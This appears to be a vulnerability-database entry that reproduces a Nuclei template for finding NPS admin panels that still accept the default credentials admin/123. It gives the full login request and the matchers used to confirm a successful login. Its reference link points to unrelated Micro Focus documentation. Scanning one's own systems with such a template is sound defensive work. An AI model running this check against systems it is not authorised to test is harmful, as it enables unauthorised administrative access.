nps-default-login: NPS Default Login

日期: 2025-08-01 | 影响软件: NPS Default Login | POC: 已公开

漏洞描述

NPS default admin credentials were discovered.

PoC代码[已公开]

id: nps-default-login

info:
  name: NPS Default Login
  author: pikpikcu
  severity: high
  description: NPS default admin credentials were discovered.
  reference:
    - https://docs.microfocus.com/NNMi/10.30/Content/Administer/Hardening/confCC2b_pwd.htm
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: nps,default-login,vuln

http:
  - raw:
      - |
        POST /login/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{Hostname}}/login/index

        username={{username}}&password={{password}}

    payloads:
      username:
        - admin
      password:
        - 123
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/json"
        part: header
        condition: and

      - type: word
        words:
          - '"msg": "login success"'
          - '"status": 1'
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210090b24882224d2a6956d8f09ac3812dd25dfe64c57983985a8805cf6756c53260022100c09aa061ab036987ab4b568257ca38453c4472aeab2d665a81aed3d61b4016df:922c64590222798bb761d5b6d8e72950